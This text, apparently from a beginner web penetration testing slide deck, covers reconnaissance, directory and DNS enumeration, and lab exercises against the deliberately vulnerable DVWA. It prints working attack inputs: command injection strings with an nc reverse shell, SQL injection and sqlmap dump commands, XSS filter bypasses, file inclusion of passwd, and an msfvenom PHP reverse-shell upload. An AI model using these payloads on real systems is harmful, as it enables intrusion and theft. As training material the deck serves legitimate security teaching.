Web Hacking
@mmar
1
�WEB HACKING
THE BASICS
2
� Exploring The
Website
As a penetration tester, your role when reviewing a website or
web application is to discover features that could potentially
be vulnerable and attempt to exploit them to assess whether
or not they are. These features are usually parts of the website
that require some interactivity with the user
Finding interactive portions of the website can be as easy as
spotting a login form to manually reviewing the website's
JavaScript. An excellent place to start is just with your browser
exploring the website and noting down the individual
pages/areas/features with a summary for each one
3
� Page Source
The page source is the human-readable code returned to our
browser/client from the web server each time we make a
request
The returned code is made up of HTML ( HyperText Markup
Language), CSS ( Cascading Style Sheets ) and JavaScript, and
it's what tells our browser what content to display, how to
show it and adds an element of interactivity with JavaScript
You can press CTRL+U or F12 to view the source code
4
� Page Source
The source code of a website sometimes provides useful
information such as framework used or any left-over
comments. We can sometimes find hidden links as well
5
� Developer Tools
Inspector
When we make requests to the web server, the server
returns various HTTP Every modern browser includes
developer tools; this is a tool kit used to aid web developers
in debugging web applications and gives you a peek under
the hood of a website to see what is going on. As a pentester,
we can leverage these tools to provide us with a much better
understanding of the web application
6
� Developer Tools
Inspector
7
� Developer Tools
Debugger/
Sources
This panel in the developer tools is intended for debugging
JavaScript, and again is an excellent feature for web
developers wanting to work out why something might not be
working. But as penetration testers, it gives us the option of
digging deep into the JavaScript code. In Firefox and Safari,
this feature is called Debugger, but in Google Chrome, it's
called Sources
8
� Developer Tools
Debugger/
Sources
9
� Manual Web
Reconnaissance
@mmar
10
� AIM
• Find Directories and pages of a website
• Find Subdomains
• Find the Technology Stack used to build the site
11
� [Link]
The [Link] file is a document that tells search engines
which pages they are and aren't allowed to show on their
search engine results or ban specific search engines from
crawling the website altogether. It can be common practice
to restrict certain website areas so they aren't displayed in
search engine results. These pages may be areas such as
administration portals or files meant for the website's
customers
[Link]
12
� [Link]
The [Link] file gives a list of every file the website
owner wishes to be listed on a search engine. These can
sometimes contain areas of the website that are a bit more
difficult to navigate to or even list some old webpages that
the current site no longer uses but are still working behind
the scenes
[Link]
13
� HTTP Headers
When we make requests to the web server, the server
returns various HTTP headers. These headers can sometimes
contain useful information such as the webserver software
and possibly the programming/scripting language in use
curl [Link] -v
14
�OSINT Websites
@mmar
15
�There are also external resources available that can help
in discovering information about your target website;
these resources are often referred to as OSINT or (Open-
Source Intelligence) as they're freely available tools that
collect information
� AIM
• Find Directories and pages of a website
• Find Subdomains
• Find the Technology Stack used to build the site
• Find Email Addresses/ leaked credentials of the
employees
17
� Google Dorks
Google hacking / Dorking utilizes Google's advanced search
engine features, which allow you to pick out custom content.
You can, for instance, pick out results from a certain domain
name using the site: filter
Filter Example Description
returns results only from the
site site:[Link]
specified website address
returns results that have the
inurl inurl:admin
specified word in the URL
returns results which are a
filetype filetype:pdf
particular file extension
intitle intitle:admin returns results that contain the
specified word in the title
18
� Finding Technology
Stack
Wappalyzer ([Link] is an online tool
and browser extension that helps identify what technologies
a website uses, such as frameworks, Content Management
Systems (CMS), payment processors and much more, and it
can even find version numbers as well. BuiltWith is another
online tool that provides the same functionality
What web is a command line utility that provides the same
information on CLI
19
� Way Back
Machine
The Wayback Machine is a historical archive of websites that
dates back to the late 90s. You can search a domain name,
and it will show you all the times the service scraped the web
page and saved the contents. This service can help uncover
old pages that may still be active on the current website.
[Link]
20
� Automated
tools
We can use automated
tools like subli3ter,
amass and theHarvester
to automatically find
subdomains of a
website
21
�Digital Certs search engines
�Digital certificates are primarily used to ensure the security and
authenticity of websites. They help to establish a secure connection
between a user's browser and the website they are trying to access, by
verifying that the website is legitimate and encrypting the data that is
exchanged between the two parties.
Digital certificates can also be used to discover subdomains of a website.
When a certificate is issued for a specific domain, it is typically issued for
that domain and any of its subdomains. Therefore, by searching for
certificates issued to a particular domain, it is possible to discover
subdomains that are associated with that domain.
23
� [Link]
Allows searching with Domain Name, Organization Name, etc
[Link]
24
� Entrust cert
search
Allows searching for partial as well as expired certificates
[Link]
25
� Censys
Censys is a search engine for all internet connected devices
and has a separate functionality to search digital certificates
[Link]
26
�Directory Busting and
VHOST Enumeration
@mmar
27
� AIM
VHOST
Dir Busting ENUMERATION
• Find Directories and • Find subdomains of a
pages of a website website
28
�GoBuster is an open-source directory and files brute-
forcing tool written in the Go programming language. It is
used for discovering hidden files and directories on a web
server by generating a list of possible directories and file
names and then trying to access them.
FFUF is another tool that is becoming popular due to its
fast speed and flexibility it provides
� Wordlists
Wordlists are lists of words or phrases that are used in the
directory and VHOST brute-forcing to generate possible
directory and VHOST names. These wordlists typically contain
common words and phrases that are used in file and
directory naming conventions, as well as common VHOST
names and subdomains.
We will be using seclists for our lecture which can be
installed by the following command in Kali Linux or Parrot OS
Sudo apt install seclists
30
�DIR BUSTING
31
� Dir Busting
Gobuster
gobuster dir -u [Link] -w /usr/share/wordlists/dirbuster/directory-list-
[Link]
FFUF
ffuf -u [Link] -w /usr/share/wordlists/dirbuster/directory-list-2.3-
[Link]
32
� Finding Files
We can specify the extensions for searching files for that
extension in the directory
Gobuster
gobuster dir -u [Link] -w /usr/share/wordlists/dirbuster/directory-list-
[Link] -x .html,.css,.js
33
� Finding Files
FFUF can also be used to brute force the files
FFUF
ffuf -u [Link] -w /usr/share/wordlists/dirbuster/directory-list-2.3-
[Link] –e .html,.css,.js,.conf
34
�VHOST ENUMERATION
35
� VHOST
Enumeration
VHOST enumeration is the process of identifying virtual hosts (VHOSTs) on
a web server. A virtual host is a method of hosting multiple domain names
on a single web server. Each domain name is associated with a unique IP
address or port number, and the web server uses this information to route
incoming requests to the appropriate website.
VHOST enumeration is often used as part of the reconnaissance phase of a
web application penetration test or vulnerability assessment. Attackers
can use VHOST enumeration to identify all the virtual hosts hosted on a
web server, and then focus their efforts on those hosts that may be
vulnerable to attacks.
36
� VHOST
Enumeration
Gobuster
gobuster vhost -u [Link] -w
/usr/share/wordlists/SecLists/Discovery/DNS/[Link] --
append-domain
FFUF
ffuf -u [Link] -w /usr/share/seclists/Discovery/DNS/subdomains-
[Link] -H "HOST:[Link]"
37
�DNS Enumeration
@mmar
38
� DNS Enumeration
DNS enumeration, also known as DNS recon, is the process of gathering
information about a domain name system (DNS) infrastructure and its
associated records. DNS is responsible for translating human-readable
domain names (e.g., [Link]) into machine-readable IP
addresses (e.g., [Link]). DNS enumeration involves querying DNS
servers to obtain various types of DNS records, which can reveal
valuable information about the target domain including hidden or
internal subdomains
39
� DNS Enumeration
The primary purpose of DNS enumeration is to gather intelligence
about a target's DNS infrastructure. It can be used by security
professionals, penetration testers, or malicious actors to identify
potential vulnerabilities, misconfigurations, or targets for further
attacks. By gathering information about the target's DNS
infrastructure, an attacker can potentially identify subdomains, mail
servers, or other potential entry points for further attacks.
40
� Record Types
Axfr Zone transfer. Includes all records
about a domain
41
� Dig
Most common DNS Enumeration tool
DNS Enumeration swiss army knife
42
� Dig
Dig can be used for simple domain lookup
>dig [Link]
43
� Dig
We can also specify the type of record with dig command
>dig ns [Link] (Name server)
>dig mx [Link] (Mail server)
>dig cname [Link] (cname record)
44
�Installing DVWA on Kali
Linux
@mmar
45
�DVWA, or Damn Vulnerable Web Application, is a web application
intentionally designed to be vulnerable to various security vulnerabilities.
It is often used as a training and learning tool to learn about web
application security and for testing the effectiveness of web application
security tools. DVWA contains several types of vulnerabilities, including:
SQL injection
File Inclusion
Cross-Site Request Forgery (CSRF)
Insecure Direct Object Reference
� Step- 1
we can simply install DVWA in automated manned with kali
repositories. Just use the following command
>sudo apt install DVWA
47
� Step- 2
Once DVWA is installed, you can use the following command
to start it
>dvwa-start
48
� Step- 3
Use the default credentials (admin/password) to log in to the
DVWA web interface. A setup page will open. Scroll down and
click on create/ reset the database
49
� Step- 4
Now, you can access DVWA and start your web pentesting.
Once done, you can stop dvwa with the following command
>dvwa-stop
50
�Brute forcing
@mmar
51
�Brute forcing is a technique used in computer science to try a
large number of possibilities, such as passwords or keys, in order
to find the correct one. It involves trying every possible
combination until the correct one is found. We will use burp
suite and hydra to brute force the login form provided by DVWA.
In this challenge, we will test a password list against the user and
try to log in as the target user
�Low-difficulty DVWA
brute forcing
53
� Step- 1
Go to DVWA security settings and set the difficulty to low
54
� Step- 2
Fire up the burp suite in your Kali Linux. Set the proxy in your
firefox to use burp as a proxy. You can also use the foxy proxy
addon to set the burp proxy
55
� Step- 3
Submit a request from firefox to log in with the wrong
credentials. the complete request will be shown in the burp.
Now right-click on it and send it to the intruder module. In the
intruder tab, clear all targets and locate the password field and
add it as a target
56
� Step- 4
Now in the payloads tab, you can set the wordlist. I am using
[Link]
57
� Step- 5
Now start the attack, burp will try to brute force it. Keep
looking for the response size. The request/ response with a
changed response size will be our matched password
58
�Medium-difficulty DVWA
brute forcing
59
� Medium
Difficulty
The medium difficulty challenge, adds a delay between
different attempts and can be solved in a similar fashion. But
the attack will be much slower
60
�High-difficulty DVWA
brute forcing
61
� High
Difficulty
In high difficulty, a CSRF token is generated for each request.
So, it becomes very difficult to brute force through it
62
�Command Execution
63
�Some websites allow you to execute commands through a web
interface typically to generate some reports. The DVWA provides
a command execution module which you can use to ping IP
addresses. We are to find a way to execute other commands
from the same text box.
�Low-difficulty DVWA
Command Execution
65
� Step- 1
Go to DVWA security settings and set the difficulty to low
66
� Step- 2
We can use multiple ways to execute commands in the same
text box. The following commands will work fine and will
execute. You can see that, we can even get a reverse shell (last
example)
[Link] && ls
[Link] & ls
[Link] ; ls
[Link] | ls
[Link] && nc -c sh [Link] 9001
67
�68
�Medium-difficulty DVWA
Command Execution
69
� Medium
Difficulty
Some type of input sanitization is being performed and & and ;
are blacklisted, but we can still use the following commands
[Link] | ls
70
�High-difficulty DVWA
Command Execution
71
� High
Difficulty
Even | is blacklisted but there is a typo and a space is there we
can enter it without space to get the result
[Link] |ls
72
�CSRF Attack
73
�CSRF stands for Cross-Site Request Forgery. It is a type of attack
that occurs when a malicious web site, email, or blog causes a
user’s web browser to perform an unwanted action on a trusted
site for which the user is currently authenticated. The attack can
be used to transfer funds, change account information, or
perform other malicious actions
� Step- 1
Go to DVWA security settings and set the difficulty to low
75
� Step- 2
Try to change the password. once you click on change, you will
see the notification that password has been changed. Now
focus on the URL. Now, you can send this URL to some other
authenticated user in an email or by any other method.
Whenever he will click on it, his password will be changed and
as we have set the password in URL, we will know the
password
76
�77
�File Inclusion
78
�File inclusion vulnerability is a type of vulnerability that allows an
attacker to include a file, usually, through a script on a web server,
that is not properly checked for validity. This can allow an attacker to
execute arbitrary code, including PHP code, on the server, potentially
leading to server compromise. There are two main types of file
inclusion vulnerabilities:
Local file inclusion (LFI) allows an attacker to include files that are
stored locally on the server
Remote file inclusion (RFI) allows an attacker to include files from
a remote server, such as through a URL
� Step- 1
Go to DVWA security settings and set the difficulty to low
80
� Step- 2
Click on the first file. We can see that file name is included in
the URL. Now we can provide any file name that is on the
system to open it. For example, we can check the passed file as
under and open the passwd file on the system that contains
the user details
81
�Step- 2
82
�SQL Injection
83
�SQL injection is a type of attack in which an attacker injects
malicious code into a website’s SQL statement and gains access
to sensitive information or performs malicious actions on the
database. This is typically done by manipulating input fields in a
web application that is connected to a database, such as a login
form or a search box, in such a way as to trick the application
into executing unintended SQL commands
�SQL injection attacks can allow attackers to bypass
authentication, access, modify, or delete sensitive data, or even
execute commands on the operating system. They can also be
used to create new user accounts with high privileges or to
perform other malicious action
� What are SQL
Queries?
SQL is a standardized language used to access and manipulate
databases to build customizable data views for each user
SQL queries are used to execute commands, such as data
retrieval, updates and record removal
E.g., queries using the SELECT statement to retrieve data,
based on user-provided parameters
86
� SQL Injection
Consider a web application that enables users to search for a
book based on the title, author, publisher and so on
The entire book catalogue is held within a database, and the
application uses SQL queries to retrieve details of different
books based on the search terms supplied by users
Case 1: User searches for all books published by Iqbal
Query: SELECT author,title,year FROM books WHERE publisher = ‘Iqbal’
In response, the database checks every row within the books table, and
returns all records where the publisher column has the value Iqbal.
87
� SQL Injection
Case 2: User searches for all books published by Al Qutb’, the
application performs the following query:
SELECT author, title, year FROM books WHERE publisher = ‘Al’
Qutb’
In this case, the query interpreter obtains the value Al and
generates SQL syntax error for Qutb’
Incorrect syntax near ‘Qutb’’.
Server: Msg 105, Level 15, State 1, Line 1
Unclosed quotation mark before the character string ‘
88
� SQL Injection
Case 3: If the user enters the search term Iqbal’ OR 1=1--, The
query will be
SELECT author, title, year FROM books WHERE publisher = ‘Iqbal’
OR 1=1--‘
This will return every single book in the retailer’s catalogue.
In this case, a second condition has been added to the WHERE clause of the
developer’s query. The database will extract each record where the publisher
column has the value Iqbal or where 1 is equal to 1. Because 1 is always equal
to 1, the database will return every record within the books table.
-- double hyphen tells the query interpreter that the remainder of the line is a
comment and should be ignored “
89
� SQL Injection
Case 4: If the user enters the search term Iqbal’ OR ‘a’ = ‘a, The
query will be
Query: SELECT author, title, year FROM books WHERE publisher =
‘Iqbal’ OR ‘a’=’a’
This example balances the trailing quotation mark without using the comment
symbol by concluding the injected input with an item of string data that
requires a trailing quote to encapsulate it
90
� SQL Injection
(Login Pages)
Case 1: User inputs his username ABC and password XYZ on
the login page, the SQL query for this will be
SELECT * FROM users WHERE username = ‘ABC’ AND password =
‘XYZ’
This query causes the database to check every row within the users table and
extract each record where the username column has the value ABC and the
password column has the value XYZ
If a user’s details are returned to the application, then the login attempt
is successful, and the application creates an authenticated session for that
user
91
� SQL Injection
(Login Pages)
Case 2: Suppose the attacker knows the username of a real
user, then he can type username’-- to bypass the password
check altogether. The SQL query for this will be
SELECT * FROM users WHERE username = ‘username’--’ AND
password =‘XYZ’
The above query because of the comment symbol is
equivalent to:
SELECT * FROM users WHERE username = ‘username’
92
� Step- 1
Go to DVWA security settings and set the difficulty to low
93
� Step- 2
if we put the following command in the box it will list down all
information in the specific category
94
� Step- 3
We can manually use complex commands to list all
information. But we are going to use sqlmap to automate the
process. First of all intercept a normal request with burp and
save it in a text document. Now launch sqlmap with the
following command
>sqlmap -r [Link] --dbs
95
� Step- 4
It will list all databases available. Now to get more information
about the tables of a particular database, we can use the
following command
>sqlmap -r [Link] -D dvwa --tables
96
� Step- 5
You can get column information of tables with the following
command
>sqlmap -r [Link] -D dvwa -T users --columns
97
� Step- 6
Now we can dump information with the following command
>sqlmap -r [Link] -D dvwa -T users --dump-all
98
�Blind SQL Injection
99
�Blind SQL injection is nearly identical to normal SQL Injection,
the only difference being the way the data is retrieved from the
database.
When the database does not output data to the web page, an
attacker is forced to steal data by asking the database a series of
true or false questions
This makes exploiting the SQL Injection vulnerability more
difficult, but not impossible
�Blind SQL
101
�XSS
102
�Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted websites.
XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to a different
end user. An attacker can use XSS to send a malicious script to an
unsuspecting user. The end user’s browser has no way to know that the
script should not be trusted, and will execute the script. Because it thinks
the script came from a trusted source, the malicious script can access any
cookies, session tokens, or other sensitive information retained by the
browser and used with that site
� Low Difficulty
you can submit the following script and whenever, any user
visits the page will get an alert
<script>alert("testing")</script>
104
�Medium Difficulty
htmlspecialchars() converts
all the bad characters like &,
", ', > and < in their equivalent
HTML character encoding so
they won’t remain in their
original form when they
reflect back in the browser
str_replace(). Here this
function is replacing all the
occurrences of <script> tag
with null or blank character
105
� Medium Difficulty
We also need to increase the input field length as it restricts the field length
to 100, just inspect the elements, increase the field limit and submit the
following script.
106
� Medium Difficulty
we can use <Script> or <scRiPt> or <ScRiPt> in place of <script>.
107
�File Upload
108
�File upload vulnerability is a vulnerability in web applications
that allows an attacker to upload malicious files to the server.
These files can then be executed on the server, potentially giving
the attacker unauthorized access to sensitive information, the
ability to execute arbitrary code, and the ability to launch further
attacks. The vulnerability typically arises when the application
does not properly validate or sanitize the file being uploaded,
allowing the attacker to upload a file with a malicious payload.
�Low-difficulty DVWA
File Upload
110
� Step- 1
Go to DVWA security settings and set the difficulty to low
111
� Step- 2
Create a msfvenom payload on your kali machine
msfvenom -p php/meterpreter/reverse_tcp LHOST=[Link]
LPORT=4444 -f raw >[Link]
112
� Step- 3
Now run Metasploit and start a multi-handler to listen to PHP
reverse sessions
>use exploit/multi/handler set payload
>php/meterpreter/reverse_tcp
113
� Step- 4
Now upload the file. The file will be uploaded without any
restriction. And then open it in the browser
114
� Step- 5
On Opening the file, we will get the reverse shell
115
�THANKS
116
